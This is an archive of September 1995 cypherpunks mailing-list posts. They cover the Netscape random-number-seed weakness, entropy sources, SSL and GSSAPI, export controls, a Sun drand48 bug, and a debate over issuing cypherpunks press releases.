he wants. this reminds me of the
Morris internet worm that ran exactly the same way. it used a
bug in the finger demon that caused a string buffer overwrite
(via strcpy, instead of strncpy) to execute customized code.

my question: I have not seen the specifics of how this works. does
this require specialized knowledge of the native machine language on the 
host machine? or is it just used to cause something like a core dump
to get a command line or something like that?


--Vlad Nuri





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 20 Sep 95 09:05:53 PDT
To: cypherpunks@toad.com
Subject: Silly NetScape RND tricks...
Message-ID: <199509201605.MAA07035@libws3.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



I've only been skimming the NetScape-related posts lately, but I've yet
to see anyone mention using a keyboard-timing sampler as a source for
some random bits... I believe this is still a workable solution even in
Windows, though probably not as 'precise' as if it were run from DOS.

Any comments?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Bianco" <bianco@itribe.net>
Date: Wed, 20 Sep 95 09:10:09 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Press release
In-Reply-To: <v01510106ac85ee814baa@[206.1.161.4]>
Message-ID: <199509201607.MAA19722@gatekeeper.itribe.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20, 10:28, Dietrich J. Kappe sent the following to the NSA's mail
archives:
> Subject: Cypherpunks Press release
|| -----BEGIN PGP SIGNED MESSAGE-----
||
|| We've seen the word "hacker" kicked around rather arbitrarily in the
press.
|| Are we to conclude that the cypherpunks are a bunch of hackers? I think
its
|| time for some cypherpunks spin. How about a logo *and* a press release?
The
|| press release would give contacts (email, phone, etc.) so that someone
on
|| this list would be contacted by journalists when a crypto story breaks.
||
|| If we get enough volunteers, we can fax blanket every newspaper,
station,
|| and network in the world.
||

I think it's a great idea, personally.  I think many journalists would like
to find third party opinions about network security and other cryptography
issues, but just don't know who to talk to about them.  By making it easy
for them to find us, we'd be more likely to be consulted for opinions.

I'd be willing to serve as a contact for my area (Southeastern Virginia) if
anyone wants to start putting together such a list.

--
==========================================================================
David J. Bianco			| Web Wonders, Online Oddities, Cool Stuff
iTribe, Inc.			| Phone: (804) 446-9060
Suite 1700, World Trade Center	| email: <bianco@itribe.net>
Norfolk, VA 23510		| URL  : http://www.itribe.net/~bianco/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@cs.monash.edu.au>
Date: Tue, 19 Sep 95 19:16:43 PDT
To: starrd@iia2.org (starrd)
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <Pine.BSD.3.91.950913234317.9083H-100000@usr3.primenet.com>
Message-ID: <199509200214.MAA08618@molly.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks,

starrd wrote:
> On Wed, 13 Sep 1995, Jiri Baum wrote:
> > 
> > I feel I should point out that you have no proof that the text you have
> > attributed to me was in fact posted by me, and in fact you have reason
...

> Wasn't a flame my friend.....wasn't meant as one either.

It wasn't taken as one... I quite agree with your description of the text
in question as "drivil" (though I wouldn't have spelled it quite that way).
We probably shouldn't judge without context, but I hear the context is
of the same intelectual quality anyway.

> > Off topic, but I have been publicly accused so I feel I should publicly
> > respond in the same forum.

I should have been clearer; that "accused" is not of stupidity, but of
posting a) allegedly trade secret material 
        b) allegedly copyright material allegedly in excess of fair use.

For which you have no proof and in fact have reason to believe otherwise etc.

> -----BEGIN PGP PUBLIC KEY BLOCK-----
...

By the way, starrd, why don't you sign your posts?
You obviously have PGP...


Hope this is less ambiguous than my previous post :-)

Jiri
- --
<jirib@cs.monash.edu.au>     <jiri@melb.dialix.oz.au>     PGP 463A14D5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMF95CixV6mvvBgf5AQHQmgP/fXrJhmmsnyAVmVyGSnUCOBVSS6sjXSua
F53GFgRS28ICxnQ2d+ooEfbtgsxuzhk1qjphW2MXROAi8QI/GQDWtNeMer0/38yg
ImyXqoysa4mKUgw0v+38QbgXIFeteIY9qyvJbe3O9WGg8gVRnRsWkxIB7QuAPkkC
jVn2ho0gYOw=
=SDDV
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Sep 95 09:23:33 PDT
To: fair@clock.org
Subject: Re: Please send me SSL problems...
Message-ID: <9509201622.AA19050@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> Jeff, the SSL specification has a severe *architectural* problem - it
> assumes that Internet Protocols are APIs ...
>  The IETF quite explicitly doesn't care about APIs

With one exception so important that it might blow away your whole
complaint...

...GSSAPI.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmtodd@servalan.servalan.com (Richard Todd)
Date: Wed, 20 Sep 95 10:30:18 PDT
To: sommerfeld@orchard.medford.ma.us
Subject: Re: My Day
In-Reply-To: <43oquc$70f@tera.mcom.com>
Message-ID: <m0svSs1-00071JC@servalan.servalan.com>
MIME-Version: 1.0
Content-Type: text/plain


In servalan.mailinglist.cypherpunks you write:

>A couple comments on using the time as a seed:

>Any system running NTP will let you know its clock to within a couple
>ms; some folks have gotten NTP accuracy down to the high hundred
>microseconds on real-time systems..

Yeah, and even if it's not running ntp full time (just doing the ntpdate
hack in cron), with any justice it's still within a second of real 
honest-to-goodness WWV-and-friends time.  

>Any entropy you get from sampling the system clock will have to come
>from the low-order bits of the tv_usec, or equivalent, and you'll only
>get a few bits per sample.

Maybe not even that; does anybody know which of the popular machines 
actually have microsecond timers, so that gettimeofday() actually returns
continuously updated microsecond values in between clock ticks?  If you 
don't have that, your entropy in those low order bits is definitely gonna
be pretty slim, since you're basically measuring the entropy in the "drift"
values ntpd is applying, which don't change very quickly.  I know BSDI 
actually uses one of the peecee timer registers to implement a microsecond
timer, so you actually get decent time resolution; dunno if the other 
peecee *BSD releases do the same.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 20 Sep 95 12:31:48 PDT
To: cypherpunks@toad.com
Subject: cypherpunks press releases/contact list: YES!! DO IT!!
Message-ID: <199509201928.MAA20230@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I'm going to argue against TCM and others who are opposed to a 
"cypherpunk press release" because this is not an "organized group".

a press release mechanism is one way by which the organization of this
group can be increased. and I'm going to say something heretical 
in cypherpunk circles, but imho, ORGANIZATION == POWER. this is
a basic rule of life that all the rabid libertarians and cryptoanarchist
loners here hate to admit, but it's really true and inescapable.

anyone who wants to issue press releases for the "cypherpunks", I say,
GO FOR IT. don't let someone discourage this because this is an
"anarchy". that's actually an excellent reason for you to JUST DO IT!!
some will be willing to have their names on the list, and they will
email you. others will flame you and not want their name included. simply
ignore the later category!!

the cypherpunk logo is not copyrighted. no one has any say on who or what
a "cypherpunk" is. so, let someone pick a reality and let it prosper
or wilt by assent and "voting with the feet".

just be careful not to misrepresent anyone. start a list, just like anyone can
start a FAQ. a list of names to contact and their specialties would be
*excellent* for this purpose. occasional press reports on what is happening
on list traffic would be very useful, too.

look, there are some very tangible and definite ways to advance the
cypherpunk agenda. there are many here who like to play in the dark
and shadows and not make any noise. that's fine!! but don't expect everyone
to share your disinterest in publicity or organization. if this is in
fact an anarchy, why are you discouraging anyone from pursing that which
interests them??

IMHO playing in the dark, not trying to appeal to the widespread masses
through the media and everything else at hand, is just the NSA's way
of trying to manupulate reality through "back door" approaches.

I again suggest that a simple list of poeople here who are willing to
talk to the press, organized under their expertise/speciality, is an
*excellent* idea that is an idea whose time has come. 

this is such a great idea that *I* may do it if nobody does it after
a week or two.


--Vlad Nuri




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Sep 95 09:32:31 PDT
To: perry@piermont.com
Subject: Re: NYT on Netscape Crack
Message-ID: <9509201631.AA19151@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


> You could do that, but thats not how C does things. C allocates these
> things on the stack.

Nope.  Just because almost all machines anyone is every going to use
in their lifetimes are stack-based doesn't mean C is stack-based.

The C compiler I once used on a LispMachine had no stack.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 20 Sep 95 12:33:26 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape sub rosa?
Message-ID: <199509201933.MAA19342@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:30 AM 9/20/95 -0700, you wrote:
>
>Gee, where's that "Cypherpunks logo" when you really need it?
>
>A rose covering the Netscape "N" logo? A crypto eagle swooping down and
>pecking at weak keys?
>
>Netscape sub rosa?

Or a big burning Netscape logo?  Or an NSA agent licking the hot end of an
electrical power cord for a Cray?  Or a picture of a lock with a big bullet
hole through it?

Oh no!  Not the "Logo Wars(tm)" again!

|             Visualize whirled keys              | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Sep 95 09:34:15 PDT
To: cypherpunks@toad.com
Subject: Why couldn't it have been 42?
Message-ID: <9509201633.AA19179@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


[drand48 is supposed to return a random number]

From: Arve Kjoelen <akjoele@shiva.ee.siue.edu>
To: cypherpunks@toad.com
Date: Wed, 20 Sep 1995 10:38:58 -0500

Kun Luo, one of our grad students here recently found a bug in Sun's
implementation of the drand48() function.  We reported it to Sun, and they
acknowledged the bug exists - it seemed to be the first time they had
heard of it, though.  The bug affects Sun's ANSI C compiler shipped with
SPARCWorks3.0 and consists of the following:  If you're compiling using
the -Xc flag (strict ANSI C, no SUN C compatibility extensions), the
function drand48() is BROKEN.  It ALWAYS returns the number 9.000000 ...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif )
Date: Wed, 20 Sep 95 03:35:43 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
Message-ID: <9509201034.AA10521@PrakInf.TU-Ilmenau.DE>
MIME-Version: 1.0
Content-Type: text/plain


Is it a good idea to use different (unrelated!) seeded PRNG's for the
challenge data (which can be seen by sniffing) and the masterkey (which
should never leave out of client's memory?

read you later  -  Holger Reif
http://remus.prakinf.tu-ilmenau.de/Reif/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 09:39:46 PDT
To: Rich Salz <rsalz@osf.org>
Subject: Re: NYT on Netscape Crack
In-Reply-To: <9509201631.AA19151@sulphur.osf.org>
Message-ID: <199509201639.MAA05261@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Rich Salz writes:
> > You could do that, but thats not how C does things. C allocates these
> > things on the stack.
> 
> Nope.  Just because almost all machines anyone is every going to use
> in their lifetimes are stack-based doesn't mean C is stack-based.

Effectively the same thing for our purposes, neh?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 20 Sep 95 09:48:21 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: FROM A FRIEND . . .
Message-ID: <199509201648.MAA14624@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


>Updating Customers:
>Netscape will provide the fix for Export (40 bit) versions of Netscape
>Navigator later this week for downloading by customers on the Internet.
>Similarly, the
>Commerce Server patch for Export versions (40 bit) will be made available
>from our home page. Because downloading of 128 bit versions of the software
>is still not permitted by U.S. law, U.S. customers of Netscape Navigator,
>Netscape Navigator Personal Edition and Netscape Commerce Server using 128
>bit versions can request the replacement from Netscape for delivery through
>the regular mail.

Funny, MIT and MPJ and others manage to enable the downloading of
export-controlled software.  Also, wasn't there some sort of promise by
Netscape after we broke the 40-bit version to make the 128-bit version
available to US users under the Beta/freeware system?  What happened to that
plan?

DCF

"This encryption thing is a lot harder than it looks."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 20 Sep 95 13:08:42 PDT
To: cypherpunks@toad.com
Subject: Re: Linking = Showing = Transferring?
Message-ID: <199509202008.NAA29083@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:18 PM 9/20/95 +0200, you wrote:

>> Browser in the US, text in US, crypto gif imported from UK, both legal.
>> 
>> Browser outside US, text in US, crypto gif imported from UK, both legal.
>> 
>> See a flaw in that?
>
>Not directly, but... what if for some strange reason the image is routed
>through US gateways on its way from the UK to, for example, Germany?
>I mean, The Net (tm) is a strange beast, and you can rarely tell which way
>the message flows... you can't even DO anything about it.

It can get pretty weird.  A friend did a traceroute on a site across town.
It was relayed half-way across the world to get there.  (Through Poland or
some such absurdity.)  

It seems that no matter what you do, you are breaking the law...
|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 20 Sep 95 10:15:55 PDT
To: fair@clock.org
Subject: Re: Please send me SSL problems...
Message-ID: <9509201715.AA19393@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>From what I can see, GSSAPI has broad acceptance and will soon have broad
use.

I've heard that Digital, HP, and IBM have all mandated that all security
code (except keymgmt and other things that are out of scope) must go
through the GSSAPI:  no writing your own stuff.  I heard, less
authoritatively, that Microsoft has the same rules, except they use a
FunnyLookingVariant(far) of an earlier GSSAPI draft.
	/r$





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <klp@gold.tc.umn.edu>
Date: Wed, 20 Sep 95 11:16:30 PDT
To: goedel@tezcat.com (Dietrich J. Kappe)
Subject: Re: Cypherpunks Press release
In-Reply-To: <v01510106ac85ee814baa@[206.1.161.4]>
Message-ID: <30605a7539c7002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


A little birdie told me that Dietrich J. Kappe said:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> We've seen the word "hacker" kicked around rather arbitrarily in the press.
> Are we to conclude that the cypherpunks are a bunch of hackers? I think its
> time for some cypherpunks spin. How about a logo *and* a press release? The
> press release would give contacts (email, phone, etc.) so that someone on
> this list would be contacted by journalists when a crypto story breaks.
> 

I think that a press release would be hard, based on the fact that there
is no central organization here on the cypherpunks list. I know that in
times past, Eric Hughes has been quoted in the press, as well as Tim, and
perhaps others (forgive my lack of memory), but there is no approved 
spokesperson because there is no organization. 

> If we get enough volunteers, we can fax blanket every newspaper, station,
> and network in the world.

Does anyone know exactly how the press contact thing works? My impression
is that a reporter/journalist stumbles on to someone who knows something 
about a particular area, and is willing to be interviewed. Then the next
time a story comes along that deals even slightly with that subject, the
reporter will tend to contact that person. 

-- 
Kevin Prigge                        |  Holes in whats left of my reason, 
CIS Consultant                      |  holes in the knees of my blues,
Computer & Information Services     |  odds against me been increasin' 
email: klp@cis.umn.edu              |  but I'll pull through...  



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 20 Sep 95 10:21:40 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Encryption algorithms used in PrivaSoft (fwd)
In-Reply-To: <43o23b$91r@calum.csclub.uwaterloo.ca>
Message-ID: <9509201721.AA07110@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


David Clavadetscher of PrivaSoft writes:
> At this time our crypto engine is patented and proprietary. 

Ian Goldberg writes:
> Waitasec...  I was under the impression that if you patented it, you had to
> reveal it.  That's why RC4 isn't patented (it used to be a trade secret).

I think I have figured out now what Clavadetscher meant. According to the
PrivaSoft home page, the product uses "bitmap encryption". Inspired by your
mention of patents being published, I sought a relevant patent, and I believe
I've found it. U.S. Patent 5,321,749 was issued to a Richard Virga of Danbury,
CT in 1994. It describes a protocol for representing an arbitrary fax
document as a bitmap, encrypting it, and encoding it for transmission. 

The user inputs a password (4-20 characters) to be used as a session key. 
However, no encryption algorithm is specified. (The patent suggests the 
familiar method of seeding a PRNG with the session key, and XORing the 
resulting stream with the plaintext bitmap.)

Assuming this is in fact the scheme PrivaSoft uses, I posit that their
"crypto engine" consists of a patented (by someone who now works for them ?)
protocol wrapped around a proprietary encryption algorithm.

20 characters (the patent doesn't discuss constraints on the character set,
AFAIK) looks rather short. This is one possible reason for the Commerce 
Dept.'s export approval.

http://www.megasoft.com/privasoft/about.html discusses PrivaSoft.
ftp://town.hall.org/patent/data/05321/05321749 is the text of Patent 5,321,749.

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp2.anu.edu.au>
Date: Tue, 19 Sep 95 21:07:29 PDT
To: cypherpunks@toad.com
Subject: [NOISE] Unabomber - crypto-anarchist?!?
Message-ID: <9509200407.AA07481@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Found this quote from the Electronic Telegraph, the online version of
a UK daily newspaper. (world news section, Weds 20th Sept)
http://www.telegraph.co.uk/et/access?ac=116192744309&pg=//95/9/20/wunab20.html

"Editors forced to print manifesto of Unabomber

By Charles Laurence in New York

...The heart of his argument is that industrial society has led to ways of 
life for which people are fundamentally unsuited. He calls for a 
crypto-anarchic revolution and a new order based on small, village-style units."
^^^^^^^^^^^^^^^

Uh? Crypto-anarchic? Surely he's not one of ours? ;-) ;-) ;-)

Sherry

ps You are supposed to register to read the ET but I registered as "cypherpunks"
passwd "cypherpunks" - don't worry I didn't give the mailing list address.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 20 Sep 95 11:12:55 PDT
To: cypherpunks@toad.com
Subject: Re: Cypherpunks Hold a Cracking Party
Message-ID: <199509201812.OAA28709@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:28 AM 9/19/95 -0400, Duncan Frissell wrote:
>Just to let everyone know that I've got an assignment from Wired to do a
>story with the above working title.
>

As it turns out, Steven Levy and I had an assignment collision at Wired and
were both assigned the story.  For some unknown reason, they wanted him to
do it instead of me so I will *not* be doing it.  

Steve -- feel free to use my title if you like.

DCF

"Anyone know any publications interested in an article on the Crack?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 14:26:10 PDT
To: karlton@netscape.com (Phil Karlton)
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <43psn2$6ug@tera.mcom.com>
Message-ID: <199509202120.OAA28581@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>     weeks ago. The time spent on patching the current release will not
>     all go to waste, but it has cut down on my limited opportunities to
>     sleep.
> 
> For those that curious: being responsible for helping to fix a bug that
> is getting front page coverage in major newspapers is not nearly as
> much fun as it sounds.
> 

	This looks really good. I only wish your PR people wouldn't
spout the garbage that they do.

	In terms of your amounts of sleep-- If netscape had waited a
month before releasing the patch it would not have been doing any
worse than most OS vendors. Netscape is to be congratulated on the
quick response.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "W. Kinney" <kinney@bogart.Colorado.EDU>
Date: Wed, 20 Sep 95 13:42:25 PDT
To: cypherpunks@toad.com
Subject: MacRandoms
Message-ID: <199509202042.OAA16124@bogart.Colorado.EDU>
MIME-Version: 1.0
Content-Type: text/plain




I've uploaded the cryptographic random number code for the Mac to 

ftp://ftp.csua.berkeley.edu/pub/cypherpunks/randomness/MacRandoms.sea.hqx

This file contains Colin Plumb's randpool code, my Macintosh wrapper for
it, and a nice 68K assembler implementation of MD5. Enjoy.

(Sorry if this has gotten posted twice, but my original post seems to have
disappeared.)

                                  -- Will




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xavier Naveira <A00467@servicom.es>
Date: Sat, 23 Sep 95 18:33:57 PDT
To: All@hudson.lm.com
Subject: Hello
Message-ID: <43p9kj$7fh@sparky.servicom.es>
MIME-Version: 1.0
Content-Type: text/plain


Hello!!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 20 Sep 95 14:50:21 PDT
To: cypherpunks@toad.com, gnu
Subject: Project: a standard cell random number generator
Message-ID: <9509202150.AA08164@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Software-generated random numbers are likely to be of poor quality.
There just isn't that much true randomness visible to computers.
Several ways to build good hardware random number generators are
known.  But before hardware random number generators can be
incorporated into common desktop computers, someone will have to put
them into a small fraction of a chip.

Currently, random number generators are chips or larger circuits.
Nobody will pay to put these on a motherboard.  But if a random number
generating circuit occupied 1/1000th of a CPU chip or "multi-function
I/O" chip, cost would not be a reason to leave it out.

You probably can't build a hardware random number generator out of
existing "gate array" gates or "standard cell" cells, because all the
existing gates and cells are designed to behave completely
predictably!  It will take designing a new circuit structure.

Do we know any solid state physics / circuit design experts who think
this might be a fun thing to do?  I bet you could get a paper out of
it.  And probably improve the world a few years later, when companies
used your paper to close another hole in their computer security.

	John

PS: It's possible that NSA collusion with chip-makers could produce
bad pseudo-random-number generators in popular chips, giving NSA a
back-door into any algorithm that used them.  This would be harder to
detect than poor software random number generators, since it requires
prying the lid off the chip, getting out your microscope, and
reverse-engineering the circuit, instead of just disassembling the
software.  In this sense, NSA ought to be *encouraging* Intel and
IBM and Motorola to put "generate random bits" instructions into
their instruction sets...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 20 Sep 95 12:57:37 PDT
To: cypherpunks@toad.com
Subject: A message from Joe Six-Pack
Message-ID: <9509201957.AA10522@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Well, the original sender of this is actually anything but "Joe
Six-Pack"; his taste in beer is well-developed, and he's no moron.
This is, however, an interesting take on the Netscape thing from a
non-cypherpunk.  He came across the Community ConneXion press release
and responded:

------- start of forwarded message (RFC 934 encapsulation) -------
From: XXXXX
Subject: Re: Fwd: HackNetscape promotion (fwd)

>For Immediate Release 
>Contact: sameer@c2.org 510-601-9777 
> 
>COMMUNITY CONNEXION OFFERS REWARD FOR EXPOSING ENCRYPTION FLAWS 
> 
>Sept 19 1995 - Community ConneXion ...

Am I the only one who finds this silly?

All this fuss about credit card encryption is such BS.  My totally
unencrypted credit card number is in the hands of brain-dead minimum-wage
waitrons and green-haired retail clerks dozens of times a week with no
encryption.  Gas station attendants, restaurant clerks, supermarkets and
banks have the number, and an unscrupulous type could use it and hose me at
any time.  I've had credit cards for 15 years and nothing like that has ever
happened.  If it does, I'm out $50 and a bunch of pain in the butt phone calls.

So the thought of some geek with a LAN sniffer and too much time on his
hands sucking simply encrypted numbers off the internet does not exactly
make my heart go pitter-pat.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Wed, 20 Sep 95 12:00:43 PDT
To: "Dietrich J. Kappe" <goedel@tezcat.com>
Subject: Re: Cypherpunks Press release
In-Reply-To: <v01510106ac85ee814baa@[206.1.161.4]>
Message-ID: <Pine.ULT.3.91.950920145548.2466B-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Sep 1995, Dietrich J. Kappe wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> We've seen the word "hacker" kicked around rather arbitrarily in the press.
> Are we to conclude that the cypherpunks are a bunch of hackers? I think its
> time for some cypherpunks spin. How about a logo *and* a press release? The
> press release would give contacts (email, phone, etc.) so that someone on
> this list would be contacted by journalists when a crypto story breaks.
> 
> If we get enough volunteers, we can fax blanket every newspaper, station,
> and network in the world.
> 
> 
> 

I've got a pretty effective list of fax numbers...everything from the fox 
network to CBS' Eye on America show.   Anyone can contact me if you need 
'em.. I'm sure we could put them to good use.

-=Kathleen M. Ellis=-

kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- y+>+(-)
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . .
And whenever they catch you, they will kill you.
But first, they must catch you. . ."
                                           -Richard Adams





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Wed, 20 Sep 95 15:05:31 PDT
To: cypherpunks@toad.com
Subject: netscpe will release code?
Message-ID: <199509202200.PAA03146@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I just spoke with a reporter from the sfchronicle who told me
that when she talked to Netscape they said that they would be
releasing parts of their source code to the net.
-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 20 Sep 95 15:15:34 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
Message-ID: <199509202215.PAA14101@ix.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20, 12:29am, Christian Wettergren wrote:
>> Subject: Re: netscape's response
>> One wild idea that I just got was to have servers and clients exchange
>> random numbers (not seeds of course), in a kind of chaining way. Since
>> most viewers connect to a number of servers, and all servers are
>> connected to by many clients, they would mix "randomness sources" with
>> each other, making it impossible to observe the local environment
>> only. And the random values would of course be encrypted under the
>> session key, making it impossible to "watch the wire".

Be _very_ careful with this approach - it's the kind of thing that a
rogue server or client might abuse to find out randomness or other state
information about the clients or servers connecting to it.
At minimum, only give out some of your randomness, XORed with some
arbitrary value to scramble the range and then hashed before sending,
so that the recipient can't find out the values you're using.

One valuable technique is to continually accumulate any randomness available,
rather than just going for what's available right when you need it.
However, one source of right-when-you-need-it randomness to contribute
to session keys is hashing the plaintext, or at least the first chunk of it;
if you use this carefully (e.g. by throwing it in with the rest of your
hash input), it should provide input unavailable to the attacker.

Also, while network boards and sound cards can provide useful randomness,
you can't depend on their existence, at least in the PC world; most home users
probably connect over modems and don't have LANs.  So any software that
would like to use these needs to include methods of detecting their existence
before trying to get data from them.  (Suns obviously all have network
interfaces,
and Sparcstations have /dev/audio, but not all Unix boxes are similarly
equipped.)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Evans <devans@hclb.demon.co.uk>
Date: Wed, 20 Sep 95 10:32:17 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Unabomber - crypto-anarchist?!?
In-Reply-To: <ac84f1b9250210046a05@[205.199.118.202]>
Message-ID: <811635300snx@hclb.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


In article <ac84f1b9250210046a05@[205.199.118.202]> you write:
> 
> But I also searched the text for mention of "crypto" and only came up with
> the fairly standard usage of "crypto leftist." My assumption then is that
> the meme of crypto anarchy has spread to the writer at that UK newspaper (I
> wonder if Brian Arthur has been talking to them?) and that he interpret's
> FR's screed in terms of crypto anarchy?
> 

Partially true, as there was an article on the leader page in Monday's
printed edition entitled "You can't put the Internet genie back in the
bottle" by Boris Johnson.  It's probably on the ET by now, but I don't
know where.

Some quotes:

"But we make three  points in defense of progress.

"The first, which has already been made, is that you can't put the genie
back in the bottle.  Next, we set against the presence of this offensive
matter [porn] the way the Internet can liberate in its sheer prolixity.
We rejoice, for instance, at how some surfer exposed the claptrap of 
L. Ron Hubbard's Scientology by publishing his "secret" texts, knowledge
of which had previously cost his disciples many thousands of pounds. We think
again of those women in the basements of Tehran, or any other place where
freedom of expression is denied.

"if there is no control over what people may read, then wherever there
are computers and telephone lines, totalitarianism will be that much
more precarious."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Wed, 20 Sep 95 12:28:51 PDT
To: Ian Goldberg <cme@tis.com>
Subject: My new perspective on ITAR (was Re: Munitions shirt (again)
In-Reply-To: <199509201549.IAA19844@cuzco.CS.Berkeley.EDU>
